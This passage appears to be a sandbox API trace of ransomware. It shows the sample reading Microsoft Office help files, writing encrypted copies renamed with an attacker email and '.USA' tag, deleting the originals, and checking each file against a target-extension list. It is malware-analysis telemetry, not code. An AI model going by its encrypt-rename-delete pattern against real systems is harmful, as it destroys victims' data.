CloseHandle (hObject=0x2ac) returned 1 [0274.272] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.272] SetEndOfFile (hFile=0x380) returned 1 [0274.283] CloseHandle (hObject=0x380) returned 1 [0274.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.317] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs")) returned 1 [0274.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.318] lstrlenW (lpString=".doc") returned 4 [0274.318] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0274.318] lstrlenW (lpString=".docx") returned 5 [0274.318] lstrcmpiW (lpString1=".docx", lpString2="R.HXS") returned -1 [0274.318] lstrlenW (lpString=".pdf") returned 4 [0274.318] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0274.318] lstrlenW (lpString=".xls") returned 4 [0274.318] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0274.318] lstrlenW (lpString=".xlsx") returned 5 [0274.318] lstrcmpiW (lpString1=".xlsx", lpString2="R.HXS") returned -1 [0274.318] lstrlenW (lpString=".ppt") returned 4 [0274.318] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0274.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.318] lstrlenW (lpString=".zip") returned 4 [0274.318] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0274.318] lstrlenW (lpString=".rar") returned 4 [0274.318] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0274.318] lstrlenW (lpString=".bz2") returned 4 [0274.318] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0274.318] lstrlenW (lpString=".7z") returned 3 [0274.318] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0274.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.318] lstrlenW (lpString=".dbf") returned 4 [0274.318] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0274.318] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString=".1cd") returned 4 [0274.319] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString=".jpg") returned 4 [0274.319] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString=".doc") returned 4 [0274.319] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1 [0274.319] lstrlenW (lpString=".docx") returned 5 [0274.319] lstrcmpiW (lpString1=".docx", lpString2="R.HXS") returned -1 [0274.319] lstrlenW (lpString=".pdf") returned 4 [0274.319] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString=".xls") returned 4 [0274.319] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString=".xlsx") returned 5 [0274.319] lstrcmpiW (lpString1=".xlsx", lpString2="R.HXS") returned -1 [0274.319] lstrlenW (lpString=".ppt") returned 4 [0274.319] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString=".zip") returned 4 [0274.319] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString=".rar") returned 4 [0274.319] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1 [0274.319] lstrlenW (lpString=".bz2") returned 4 [0274.319] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1 [0274.319] lstrlenW (lpString=".7z") returned 3 [0274.319] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.319] lstrlenW (lpString=".dbf") returned 4 [0274.319] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1 [0274.319] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.320] lstrlenW (lpString=".1cd") returned 4 [0274.320] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1 [0274.320] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS") returned 66 [0274.320] lstrlenW (lpString=".jpg") returned 4 [0274.320] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1 [0274.320] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0274.320] lstrlenW (lpString="INFOPATHEDITOR_COL.HXT") returned 22 [0274.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.330] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=214) returned 1 [0274.330] CloseHandle (hObject=0x3b0) returned 1 [0274.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 0x20 [0274.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.330] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.330] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0274.331] GetLastError () returned 0x0 [0274.331] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0xd6, lpOverlapped=0x0) returned 1 [0274.331] WriteFile (in: hFile=0x38c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0274.332] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.332] WriteFile (in: hFile=0x38c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x100, lpOverlapped=0x0) returned 1 [0274.332] SetEndOfFile (hFile=0x38c) returned 1 [0274.332] CloseHandle (hObject=0x38c) returned 1 [0274.332] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.332] SetEndOfFile (hFile=0x3b0) returned 1 [0274.334] CloseHandle (hObject=0x3b0) returned 1 [0274.334] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.335] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 1 [0274.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.335] lstrlenW (lpString=".doc") returned 4 [0274.335] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.335] lstrlenW (lpString=".docx") returned 5 [0274.335] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.335] lstrlenW (lpString=".pdf") returned 4 [0274.335] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.335] lstrlenW (lpString=".xls") returned 4 [0274.335] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.335] lstrlenW (lpString=".xlsx") returned 5 [0274.335] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.335] lstrlenW (lpString=".ppt") returned 4 [0274.335] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.335] lstrlenW (lpString=".zip") returned 4 [0274.335] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.335] lstrlenW (lpString=".rar") returned 4 [0274.335] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.335] lstrlenW (lpString=".bz2") returned 4 [0274.335] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.336] lstrlenW (lpString=".7z") returned 3 [0274.336] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString=".dbf") returned 4 [0274.336] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString=".1cd") returned 4 [0274.336] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString=".jpg") returned 4 [0274.336] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString=".doc") returned 4 [0274.336] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.336] lstrlenW (lpString=".docx") returned 5 [0274.336] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.336] lstrlenW (lpString=".pdf") returned 4 [0274.336] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.336] lstrlenW (lpString=".xls") returned 4 [0274.336] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.336] lstrlenW (lpString=".xlsx") returned 5 [0274.336] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.336] lstrlenW (lpString=".ppt") returned 4 [0274.336] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.336] lstrlenW (lpString=".zip") returned 4 [0274.336] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.337] lstrlenW (lpString=".rar") returned 4 [0274.337] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.337] lstrlenW (lpString=".bz2") returned 4 [0274.337] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.337] lstrlenW (lpString=".7z") returned 3 [0274.337] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.337] lstrlenW (lpString=".dbf") returned 4 [0274.337] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.337] lstrlenW (lpString=".1cd") returned 4 [0274.337] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0274.337] lstrlenW (lpString=".jpg") returned 4 [0274.337] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.337] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.337] lstrlenW (lpString="INFOPATHEDITOR_F_COL.HXK") returned 24 [0274.337] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.337] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=114) returned 1 [0274.338] CloseHandle (hObject=0x3b0) returned 1 [0274.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 0x20 [0274.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.338] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.338] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0274.338] GetLastError () returned 0x0 [0274.338] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x72, lpOverlapped=0x0) returned 1 [0274.339] WriteFile (in: hFile=0x38c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x80, lpOverlapped=0x0) returned 1 [0274.340] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.340] WriteFile (in: hFile=0x38c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x104, lpOverlapped=0x0) returned 1 [0274.340] SetEndOfFile (hFile=0x38c) returned 1 [0274.340] CloseHandle (hObject=0x38c) returned 1 [0274.340] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.340] SetEndOfFile (hFile=0x3b0) returned 1 [0274.342] CloseHandle (hObject=0x3b0) returned 1 [0274.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.342] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk")) returned 1 [0274.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.344] lstrlenW (lpString=".doc") returned 4 [0274.344] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.344] lstrlenW (lpString=".docx") returned 5 [0274.344] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.344] lstrlenW (lpString=".pdf") returned 4 [0274.344] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.344] lstrlenW (lpString=".xls") returned 4 [0274.344] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.344] lstrlenW (lpString=".xlsx") returned 5 [0274.344] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.344] lstrlenW (lpString=".ppt") returned 4 [0274.344] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString=".zip") returned 4 [0274.345] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString=".rar") returned 4 [0274.345] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString=".bz2") returned 4 [0274.345] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.345] lstrlenW (lpString=".7z") returned 3 [0274.345] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString=".dbf") returned 4 [0274.345] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString=".1cd") returned 4 [0274.345] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString=".jpg") returned 4 [0274.345] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.345] lstrlenW (lpString=".doc") returned 4 [0274.345] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.345] lstrlenW (lpString=".docx") returned 5 [0274.345] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.345] lstrlenW (lpString=".pdf") returned 4 [0274.345] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString=".xls") returned 4 [0274.345] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.345] lstrlenW (lpString=".xlsx") returned 5 [0274.345] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.345] lstrlenW (lpString=".ppt") returned 4 [0274.346] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.346] lstrlenW (lpString=".zip") returned 4 [0274.346] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.346] lstrlenW (lpString=".rar") returned 4 [0274.346] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.346] lstrlenW (lpString=".bz2") returned 4 [0274.346] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.346] lstrlenW (lpString=".7z") returned 3 [0274.346] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.346] lstrlenW (lpString=".dbf") returned 4 [0274.346] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.346] lstrlenW (lpString=".1cd") returned 4 [0274.346] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.346] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK") returned 72 [0274.346] lstrlenW (lpString=".jpg") returned 4 [0274.346] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.346] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.346] lstrlenW (lpString="INFOPATHEDITOR_K_COL.HXK") returned 24 [0274.346] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.347] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=113) returned 1 [0274.347] CloseHandle (hObject=0x3b0) returned 1 [0274.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 0x20 [0274.347] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0274.347] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.347] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.347] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.373] GetLastError () returned 0x0 [0274.373] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x71, lpOverlapped=0x0) returned 1 [0274.374] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x80, lpOverlapped=0x0) returned 1 [0274.375] ReadFile (in: hFile=0x3b0, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.375] WriteFile (in: hFile=0x394, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x104, lpOverlapped=0x0) returned 1 [0274.375] SetEndOfFile (hFile=0x394) returned 1 [0274.375] CloseHandle (hObject=0x394) returned 1 [0274.375] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.375] SetEndOfFile (hFile=0x3b0) returned 1 [0274.378] CloseHandle (hObject=0x3b0) returned 1 [0274.378] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 